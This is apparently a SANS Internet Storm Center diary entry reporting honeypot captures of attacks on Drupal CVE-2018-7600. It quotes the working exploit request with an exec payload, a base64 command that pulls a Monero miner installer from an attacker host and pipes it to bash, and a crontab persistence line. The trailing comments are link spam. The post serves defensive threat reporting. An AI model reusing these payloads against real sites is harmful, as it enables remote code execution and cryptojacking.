Drupal CVE-2018-7600 PoC is Public

Published: 2018-04-13
Last Updated: 2018-04-13 15:06:15 UTC
by Kevin Liston (Version: 1)
1 comment(s)

[Update: Now used to install Monero Miners. See below for details]

Drupal announced a Remote Code Execution vulnerability affecting Drupal 7.x and 8.x on March 28 (https://www.drupal.org/sa-core-2018-002)

Proof of concpet code appeared on github on April 12th.  Quick testing on handler's honeypots indicate that it functions as advertised.

Upgrade to 7.58 or 8.5.1

Scans/attemps are showing up in other Handlers' honeypots:

115.236.45.238 - - [13/Apr/2018:03:20:55 +0200] "POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1" 200 38174 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:52.0) Gecko/20100101 Firefox/52.0"

And here is a second exploit attempt, trying to identify vulnerable servers:

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: <hostname>
User-Agent: python-requests/2.18.4
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive
Content-Length: 162
Content-Type: application/x-www-form-urlencoded

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=ping <hostname>.mu6fea.ceye.io -c 1

The payload pings a host where the hostname of the target is prefixed to the hostname to be pinged. This is sort of interesting as mu6fea.ceye.io is a wildcard DNS entry, and *.mu6fea.ceye.io appears to resolve to 118.192.48.48 right now. So the detection of who is "pinging" is made most likely via DNS.

The authoritative name server for "ceye.io" is ns[12].hackernews.cc, which appears to belong to a Chinese security news site. Maybe they are working on a story to publish how many vulnerable systems there are, but actual exploitation of a vulnerability, even if somewhat benign, may be a step too far for a news story.

Other payloads spotted so far:

echo `whoami`
phpinfo()
echo 123
whoami
touch 1.html
echo "xiokv"

The exploit attempts are currently arriving at a pretty brisk pace.

Here is one installing the standard xmrig Monero miner. The exploit string (spaces added to allow for wrapping on small screens):

echo KC91c3IvYmluL2N1cmwgLWZzU0wgaHR0c DovL3RjOHpkdy5pZjFqMHl0Z2t5cGEudGsvaSB8 fCAvdXNyL2Jpbi93Z2V0IGh0dHA6Ly90Yzh6 ZHcuaWYxajB5dGdreXBhLnRrL2kgLXFPLSkgfCAvYmluL2Jhc2g= | base64 -d | bash

This decodes to: (http replaced with hxxp)

/usr/bin/curl -fsSL hxxp://tc8zdw.if1j0ytgkypa.tk/i || /usr/bin/wget hxxp://tc8zdw.if1j0ytgkypa.tk/i -qO-) | /bin/bash

"i" is an installer script. It collects information about the system and makes itself persistent via an entry in the crontab:

*/30 * * * *   root   pkill -f /tmp/ ; (curl -fsSL http://${host}/i -o ${FN} || wget http://${host}/i -q -O ${FN}) ; bash ${FN} 1 &

It also download additional files:

  • A script to kill competing miners: http://tc8zdw.if1j0ytgkypa.tk/k
  • and the actual xmrig miner: http://tc8zdw.if1j0ytgkypa.tk/64. (the filename depends on the output from "getconf LONG_BIT")

the miner will then connect to port 6666 on u5evn7.if1j0ytgkypa.tk , which currently resolves to 207.246.113.230 and  144.202.37.130.

Keywords:
1 comment(s)
ISC Stormcast For Friday, April 13th 2018 https://isc.sans.edu/podcastdetail.html?id=5953

Comments

cwqwqwq
eweew<a href="https://www.seocheckin.com/edu-sites-list/">mashood</a>
WQwqwqwq[url=https://www.seocheckin.com/edu-sites-list/]mashood[/url]
dwqqqwqwq mashood
[https://isc.sans.edu/diary.html](https://isc.sans.edu/diary.html)
[https://isc.sans.edu/diary.html | https://isc.sans.edu/diary.html]
What's this all about ..?
password reveal .
<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure:

<a hreaf="https://technolytical.com/">the social network</a> is described as follows because they respect your privacy and keep your data secure. The social networks are not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go.

<a hreaf="https://technolytical.com/">the social network</a> is not interested in collecting data about you. They don't care about what you're doing, or what you like. They don't want to know who you talk to, or where you go. The social networks only collect the minimum amount of information required for the service that they provide. Your personal information is kept private, and is never shared with other companies without your permission
https://thehomestore.com.pk/

Diary Archives